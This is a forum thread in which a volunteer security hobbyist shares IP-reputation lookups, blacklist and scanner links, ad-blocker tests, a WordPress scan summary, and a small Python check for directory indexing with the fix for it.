Post by: polonus on November 21, 2023, 06:25:47 PM
IP blacklist resources: https://www.abuseipdb.com/check/159.89.170.171
Also found to be blacklisted here: -http://202.38.95.67/sshrawlist.php?ip=159.89.170.171 (not secured, plain http!)

But no data given here: https://www.projecthoneypot.org/ip_159.89.170.171

polonus
Title: Re: Tests and other Media topics
Post by: polonus on November 23, 2023, 10:51:41 PM
Here we see the importance of a good ad-blocker to prevent connecting to a PUP-redirect (S.BL.Domain.gen)
on a normally non-malicious website:

Suspicious files and blacklisted links: https://quttera.com/detailed_report/webshopchecker.nl

Given the all green here: https://www.virustotal.com/gui/url/42afdffac58afd83fff298bdfd2e5fb316ad98d9651a320b20145bab2ca892fe

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 04, 2023, 10:54:29 PM
Test your adblocker capability here: https://adblock-tester.com/

My score: 100 points out of 100
(11 services, 22 checks)

pol
Title: Re: Tests and other Media topics
Post by: Lano on December 05, 2023, 01:41:59 AM
Thanks pol, same here. :)
Title: Re: Tests and other Media topics
Post by: polonus on December 05, 2023, 03:43:13 PM
Another ad block test at Toolz here: https://d3ward.github.io/toolz/adblock.html   (site OK).

But there also are test sites that themselves are being blocked as malicious, see this one :
https://www.virustotal.com/gui/url/5e277db1e13d06cb4b6945270952ca00c034c44b9b88f45c83e8533b93aa4c22
Also see on IP: https://www.shodan.io/host/104.21.94.34 e.g. Cloudflare driven WP site.
But not all scans agree: https://quttera.com/detailed_report/canyoublockit.com

So on the Interwebz it is not always clear from the start where eventual malware etc. may or may not raise its ugly head. ;)

pol
Title: Re: Tests and other Media topics
Post by: polonus on December 10, 2023, 02:36:57 PM
Be aware of vulnerabilities.

Where it is being abused: https://www.abuseipdb.com/check/2a00:6020:b098:600:5dc4:7f9a:5d25:7bf

Found on what domain: -https://www.shodan.io/search?query=deutsche-glasfaser.de

Server vulnerabilities there: -https://www.tenable.com/plugins/nessus/172186 (Nessus plugin 172186: Apache 2.4.x < 2.4.56 Multiple Vulnerabilities) -> -https://blog.qualys.com/vulnerabilities-threat-research/2021/10/27/apache-http-server-path-traversal-remote-code-execution-cve-2021-41773-cve-2021-42013

Make the above links live whenever you are active in research or qualified to do so.

Also links to: -https://www.shodan.io/search?query=bc.googleusercontent.com
Vulnerabilities in Python SMTP 1.4.2 -> -https://security.snyk.io/package/pip/py/1.4.2 (Re-DOS-able).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 10, 2023, 03:02:04 PM
I performed a WordPress Security scan here: https://hackertarget.com/wordpress-security-scan/
on Homepage - Die Unbestechlichen -> 10 issues

Outdated CMS version + 8 outdated WP plug-ins.

User enumeration possible. External links checked against multiple blacklists.

Scan your WP website and feel more secure.

pol
Title: Re: Tests and other Media topics
Post by: bob3160 on December 10, 2023, 03:15:08 PM
Quote
I performed a WordPress Security scan here: https://hackertarget.com/wordpress-security-scan/
on Homepage - Die Unbestechlichen -> 10 issues

Outdated CMS version + 8 outdated WP plug-ins.

User enumeration possible. External links checked against multiple blacklists.

Scan your WP website and feel more secure.

pol
Thanks Damien
Title: Re: Tests and other Media topics
Post by: polonus on December 10, 2023, 04:07:18 PM
You're welcome, bob3160.

Something from Google to be introduced in the European Union = Google Chrome to display "choose your search engine" prompt

Re: https://www.ghacks.net/2023/12/09/google-chrome-to-display-choose-your-search-engine-prompt/

I use DDG and Qwant for my search queries - chrome://settings/searchEngines in my browser.
- Avoid searching via www dot oscobo dot com, as Avast flags this engine as unsafe.

I check my English grammar and spelling with Quillbot active (a form of AI).

Have a nice Sunday, Bob,

your avast forum-friend,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 13, 2023, 06:58:23 PM
Abuse and malware launched from IP: https://www.abuseipdb.com/check/115.49.29.141
and https://urlhaus.abuse.ch/url/2740313/

But this scan finds it OK? -> https://db-ip.com/115.49.29.141  (no attack source?).
Neither here: https://www.virustotal.com/gui/url/6eaea1a844d227792c2e4fada54036c9468d8d310bb2a119cddd60d8c72ff348?nocache=1

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 14, 2023, 02:39:24 PM
Additional resources: https://awebanalysis.com/en/ip-lookup/141.101.76.192/

Because of: https://www.abuseipdb.com/check/141.101.76.199

This while nothing is alerted here: https://www.virustotal.com/gui/url/38635c8db081057bc8f9710ed2c4a7322f336cd2a77daa8ea39450678007c7ea?nocache=1

WordPress users for instance should not assume they are completely secure because they are running behind Cloudflare.

Abuse can be performed from all places, also from within the cloud.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 15, 2023, 04:05:11 PM
DNS resources, see: https://ipchaxun.com/185.153.133.14/

pol
Title: Re: Tests and other Media topics
Post by: polonus on December 16, 2023, 03:04:47 PM
Checking IP against GreyNoise data.
What IP - 69.49.231.8  Found where? https://www.abuseipdb.com/check/69.49.231.8
Results found as malicious SSH worm and SSH bruteforcer: https://viz.greynoise.io/ip/69.49.231.8
Missed here: https://blacklist.myip.ms/69.49.231.8
Detected manifold: https://www.virustotal.com/gui/url/dbb5203c8034a8229c1ea351312249048f279920eda17737ffa3ddba80a5dae8
IP info: https://www.shodan.io/host/69.49.231.8 - https://ipinfo.io/69.49.231.8
Newfold Digital info: https://www.shodan.io/search?query=69-49-231-8.webhostbox.net

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 18, 2023, 04:54:32 PM
Interesting IP scan resources: https://www.criminalip.io/asset/report/89.248.163.172
See: https://www.abuseipdb.com/check/89.248.163.172

But also be aware of these results: https://quttera.com/detailed_report/www.criminalip.io

To be combined with this one: https://www.projecthoneypot.org/ip_89.248.163.172  (actually no data on that one)

And then go here: https://www.shodan.io/host/89.248.163.172  (see all vulnerabilities given there for that particular IP-address).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 21, 2023, 10:07:37 PM
Compare various sources for this malicious IP:

https://www.abuseipdb.com/check/146.19.191.205
with the abuse mentioned: https://urlhaus.abuse.ch/url/2743271/
No data yet: https://www.projecthoneypot.org/ip_146.19.191.205
nor here: https://ipaddress.is/146.19.191.222
But here: https://www.criminalip.io/asset/report/146.19.191.205

polonus
Title: Re: Tests and other Media topics
Post by: polonus on December 24, 2023, 04:45:18 PM
AI-driven website scanners. This is what I can quote from Chatbot AI on that issue:
Quote
AI: Hello human,

You:
What website scanners are AI-driven?
AI: There are several website scanners that utilize AI-driven technology to enhance their scanning capabilities. Some popular AI-driven website scanners include:

1. Acunetix: Acunetix is a web vulnerability scanner that uses AI technology to detect and prioritize potential security vulnerabilities on websites.

2. Netsparker: Netsparker is another AI-powered web vulnerability scanner that automatically identifies security flaws in web applications, including cross-site scripting (XSS) and SQL injection vulnerabilities.

3. Detectify: Detectify is a web security scanner that employs AI algorithms to scan websites for security issues, including outdated software, misconfigurations, and vulnerabilities.

4. WebARX: WebARX is a website security platform that utilizes AI to detect and protect against various web-based threats, such as malware infections, brute force attacks, and code injections.

5. Qualys Web Application Scanning (WAS): Qualys WAS is a cloud-based web application scanner that leverages AI and machine learning to identify vulnerabilities and provide detailed reports for remediation.

These are just a few examples of AI-driven website scanners available in the market. It's important to research and evaluate different options to find the one that best suits your specific needs and requirements.

There is a good chance we will see many more, and also free, AI-driven website scanners, just like AI-driven website building.
It is a new paradigm; a whole new AI world is dawning on us all.

polonus (volunteer cold recon website security-analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on December 26, 2023, 12:56:35 PM
Re: https://www.abuseipdb.com/check/185.167.97.244
Then we find this is a WordPress site with 2 configuration issues - outdated plug-in
   Plugin   Update Status   About
gutenberg 17.2.0   Warning   latest release (17.3.0)
'-https://github.com/
&
Directory Indexing
In the test an attempt was made to list the directory contents of the uploads and plugins folders to determine if Directory Indexing is enabled. This is a common information leakage vulnerability that can reveal sensitive information regarding your site configuration or content.

Path Tested   Status
/wp-content/uploads/      enabled
/wp-content/plugins/      disabled

This is OK: console.kamatera.com   hosted at CLOUDWEBMANAGE-EU

polonus
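The directory-indexing probe the report above describes, as an added example (not hackertarget's scanner): it requests the two tested paths and treats only a 200 whose body carries autoindex markers as a listing. The base URL example.invalid, the fetcher and the responses are constructed so the check runs offline; the same function takes a live fetcher for a site of your own.

```python
import re
from typing import Callable, Dict, Tuple
from urllib.error import HTTPError, URLError
from urllib.request import Request, urlopen

# The two paths the report above tests.
TESTED_PATHS = ("/wp-content/uploads/", "/wp-content/plugins/")

# Markers that Apache mod_autoindex and nginx autoindex put in listing pages.
LISTING_MARKERS = tuple(re.compile(p, re.I) for p in (
    r"<title>\s*Index of /", r"<h1>\s*Index of /", r"Parent Directory"))

def looks_like_listing(status: int, body: str) -> bool:
    """Only a 200 whose body carries autoindex markers counts: WordPress ships an
    empty index.php in several folders, so a bare 200 alone proves nothing."""
    return status == 200 and any(m.search(body) for m in LISTING_MARKERS)

def http_fetch(url: str) -> Tuple[int, str]:
    """Live fetcher: returns (status, body) and never raises."""
    req = Request(url, headers={"User-Agent": "dirindex-check/0.1"})
    try:
        with urlopen(req, timeout=10) as resp:
            return resp.getcode(), resp.read(65536).decode("utf-8", "replace")
    except HTTPError as err:
        return err.code, ""
    except URLError:
        return 0, ""

def check_directory_indexing(base_url: str,
                             fetch: Callable[[str], Tuple[int, str]] = http_fetch
                             ) -> Dict[str, str]:
    """Return {path: 'enabled' | 'disabled'}, the same shape as the report table."""
    base = base_url.rstrip("/")
    return {p: "enabled" if looks_like_listing(*fetch(base + p)) else "disabled"
            for p in TESTED_PATHS}

# Constructed responses reproducing the report's outcome: uploads lists, plugins does not.
CONSTRUCTED = {
    "https://example.invalid/wp-content/uploads/": (200,
        "<html><head><title>Index of /wp-content/uploads</title></head><body>"
        "<h1>Index of /wp-content/uploads</h1><a href=\"../\">Parent Directory</a>"
        "<a href=\"2023/\">2023/</a></body></html>"),
    # WordPress's empty index.php answers 200 with no listing markers.
    "https://example.invalid/wp-content/plugins/": (200, ""),
}

def constructed_fetch(url: str) -> Tuple[int, str]:
    return CONSTRUCTED.get(url, (404, ""))

if __name__ == "__main__":
    print(check_directory_indexing("https://example.invalid", constructed_fetch))
    # Remedy: Apache "Options -Indexes" (.htaccess or vhost); nginx "autoindex off;" (the default)
```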
Title: Re: Tests and other Media topics
Post by: polonus on January 07, 2024, 10:40:09 PM
Chaos in, chaos out - a lot of this on the AI search engine komo.ai.
AI needs more time to mature.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 03, 2024, 02:50:20 PM
Compare abuse IPs: https://viz.greynoise.io/ip/5.255.98.23
with https://www.abuseipdb.com/check/5.255.98.23
and: https://www.shodan.io/host/5.255.98.23 

Vulnerabilities? -> https://security.stackexchange.com/questions/256579/any-known-ssh-attacks-vulnerabilities-other-than-brute-force-dictionary-attacks

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 13, 2024, 11:29:23 AM
Google Chrome is phasing out its Manifest Version 2,
changing to MV3 with ad-blocking restrictions.
This means ad-blocking will be a harder task in your browser.

Test: https://adblock-tester.com/

Ad-listing differentiation may help.
Use a browser that does not make use of the MV3 extension-API.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 16, 2024, 12:06:11 AM
Warning when entering page: https://webparanoid.com/nl/warning.html#/

Website warned against: wXw.capsolver.com  (fake user reports)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 18, 2024, 09:53:03 PM
Test with Google: https://search.google.com/test/amp/result

Test DNS leaks: https://www.dnsleaktest.com/

Test: https://my-location.org/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on February 23, 2024, 02:39:34 PM
Check on IP -> https://viz.greynoise.io/ip/196.3.142.1

See: https://www.ipqualityscore.com/ip-reputation-check/lookup/196.3.142.1

See: https://www.shodan.io/host/196.3.142.1

See: https://www.abuseipdb.com/check/196.3.142.1

Stays unrated here: https://scan.safetoopen.com/?id=f312387c11302daf53cb17d2539792b941b42405f42ca6153680343edcca562b

Now 1 vendor to flag: https://www.virustotal.com/gui/url/90ce51471ab9fd1f936269462bd5834b1677a67047d8fa17698afa962e88a104?nocache=1
(had been given the all green 7 years ago).

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 02, 2024, 12:12:52 AM
Monitoring is an important function for any cloud network:
https://radar.cloudflare.com/scan/2bdd431c-73bb-4570-bda5-777ac35f1215/summary  (random example)

Another test: https://isbgpsafeyet.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 09, 2024, 06:56:54 PM
How are apps tracking you? App tracking transparency:

See per app: https://reports.exodus-privacy.eu.org/en/reports/com.whatsapp/latest/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on March 10, 2024, 02:58:42 PM
IP scans: https://opentip.kaspersky.com/103.140.194.75/?tab=lookup
Re: https://maltiverse.com/ip/103.140.194.120
and https://www.abuseipdb.com/check/103.140.194.75

polonus